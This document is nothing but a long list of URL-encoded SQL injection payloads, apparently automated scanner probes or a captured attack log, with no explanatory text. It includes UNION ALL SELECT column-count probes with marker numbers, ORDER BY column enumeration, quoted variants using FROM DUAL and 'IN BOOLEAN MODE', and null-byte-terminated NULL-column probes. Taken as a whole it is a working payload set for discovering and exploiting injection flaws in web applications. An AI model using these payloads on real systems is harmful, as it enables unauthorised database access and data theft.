-8253%20%2B%20%28SELECT%203212%20WHERE%209511%3D9511%20UNION%20ALL%20SELECT%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511%2C%209511--%20%20%29 -9311%20%2B%20%28SELECT%203789%20WHERE%206157%3D6157%20UNION%20ALL%20SELECT%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157--%20%20%29 -2581%20%2B%20%28SELECT%208958%20WHERE%208186%3D8186%20UNION%20ALL%20SELECT%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186%2C%208186--%20%20%29 -9172%20%2B%20%28SELECT%207505%20WHERE%201630%3D1630%20UNION%20ALL%20SELECT%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630%2C%201630--%20%20%29 -9480%20%2B%20%28SELECT%209143%20WHERE%204448%3D4448%20UNION%20ALL%20SELECT%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448%2C%204448--%20%20%29 -9489%20%2B%20%28SELECT%206983%20WHERE%208811%3D8811%20UNION%20ALL%20SELECT%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811--%20%20%29 -4656%20%2B%20%28SELECT%201730%20WHERE%201694%3D1694%20UNION%20ALL%20SELECT%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694%2C%201694--%20%20%29 -3384%20%2B%20%28SELECT%208244%20WHERE%207681%3D7681%20UNION%20ALL%20SELECT%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681%2C%207681--%20%20%29 -3460%20%2B%20%28SELECT%209266%20WHERE%202332%3D2332%20UNION%20ALL%20SELECT%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332--%20%20%29 -5087%20%2B%20%28SELECT%205620%20WHERE%203388%3D3388%20UNION%20ALL%20SELECT%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388--%20%20%29 -9283%27%20%2B%20%28SELECT%20%27KEat%27%20FROM%20DUAL%20WHERE%206977%3D6977%20UNION%20ALL%20SELECT%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977%2C%206977--%20%20%29%20%2B%20%27 -2703%27%20%2B%20%28SELECT%20%27GkRT%27%20FROM%20DUAL%20WHERE%205845%3D5845%20UNION%20ALL%20SELECT%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845%2C%205845--%20%20%29%20%2B%20%27 -2159%27%20%2B%20%28SELECT%20%27dAXR%27%20FROM%20DUAL%20WHERE%208798%3D8798%20UNION%20ALL%20SELECT%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798--%20%20%29%20%2B%20%27 -9646%27%20%2B%20%28SELECT%20%27iuTD%27%20FROM%20DUAL%20WHERE%204244%3D4244%20UNION%20ALL%20SELECT%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244--%20%20%29%20%2B%20%27 -2843%27%20%2B%20%28SELECT%20%27QomO%27%20FROM%20DUAL%20WHERE%207744%3D7744%20UNION%20ALL%20SELECT%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744%2C%207744--%20%20%29%20%2B%20%27 -7258%27%20%2B%20%28SELECT%20%27xDVp%27%20FROM%20DUAL%20WHERE%205579%3D5579%20UNION%20ALL%20SELECT%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579%2C%205579--%20%20%29%20%2B%20%27 -9017%27%20%2B%20%28SELECT%20%27mMTW%27%20FROM%20DUAL%20WHERE%205756%3D5756%20UNION%20ALL%20SELECT%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756%2C%205756--%20%20%29%20%2B%20%27 -8862%27%20%2B%20%28SELECT%20%27HpNB%27%20FROM%20DUAL%20WHERE%203469%3D3469%20UNION%20ALL%20SELECT%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469%2C%203469--%20%20%29%20%2B%20%27 -3337%27%20%2B%20%28SELECT%20%27tglS%27%20FROM%20DUAL%20WHERE%201747%3D1747%20UNION%20ALL%20SELECT%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747%2C%201747--%20%20%29%20%2B%20%27 -7981%27%20%2B%20%28SELECT%20%27wtsK%27%20FROM%20DUAL%20WHERE%201577%3D1577%20UNION%20ALL%20SELECT%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577%2C%201577--%20%20%29%20%2B%20%27 -8016%27%20%2B%20%28SELECT%20%27Mpam%27%20WHERE%206797%3D6797%20UNION%20ALL%20SELECT%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797%2C%206797--%20%20%29%20%2B%20%27 -7023%27%20%2B%20%28SELECT%20%27Rjhu%27%20WHERE%203757%3D3757%20UNION%20ALL%20SELECT%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757%2C%203757--%20%20%29%20%2B%20%27 -6269%27%20%2B%20%28SELECT%20%27SEUE%27%20WHERE%208823%3D8823%20UNION%20ALL%20SELECT%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823--%20%20%29%20%2B%20%27 -7688%27%20%2B%20%28SELECT%20%27tgkv%27%20WHERE%201676%3D1676%20UNION%20ALL%20SELECT%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676--%20%20%29%20%2B%20%27 -7148%27%20%2B%20%28SELECT%20%27LUys%27%20WHERE%201265%3D1265%20UNION%20ALL%20SELECT%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265%2C%201265--%20%20%29%20%2B%20%27 -7244%27%20%2B%20%28SELECT%20%27mFcb%27%20WHERE%209187%3D9187%20UNION%20ALL%20SELECT%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187%2C%209187--%20%20%29%20%2B%20%27 -2797%27%20%2B%20%28SELECT%20%27rBdu%27%20WHERE%201254%3D1254%20UNION%20ALL%20SELECT%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254%2C%201254--%20%20%29%20%2B%20%27 -2427%27%20%2B%20%28SELECT%20%27OjzZ%27%20WHERE%208151%3D8151%20UNION%20ALL%20SELECT%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151--%20%20%29%20%2B%20%27 -6233%27%20%2B%20%28SELECT%20%27FkLI%27%20WHERE%203452%3D3452%20UNION%20ALL%20SELECT%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452%2C%203452--%20%20%29%20%2B%20%27 -9045%27%20%2B%20%28SELECT%20%27dUQB%27%20WHERE%206718%3D6718%20UNION%20ALL%20SELECT%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718%2C%206718--%20%20%29%20%2B%20%27 -8654%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846%2C%208846--%20%20%23 -1243%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145%2C%208145--%20%20%23 -3279%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851--%20%20%23 -8058%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895%2C%209895--%20%20%23 -7005%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033%2C%202033--%20%20%23 -1535%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000--%20%20%23 -4713%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503%2C%206503--%20%20%23 -2354%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868%2C%204868--%20%20%23 -7460%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964--%20%20%23 -5885%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114--%20%20%23 1%29%20ORDER%20BY%201%00 1%29%20ORDER%20BY%201906%00 1%29%20UNION%20ALL%20SELECT%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20ORDER%20BY%201%00 1%27%29%20ORDER%20BY%206603%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20ORDER%20BY%201%00 1%27%20ORDER%20BY%204027%00 1%27%20UNION%20ALL%20SELECT%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 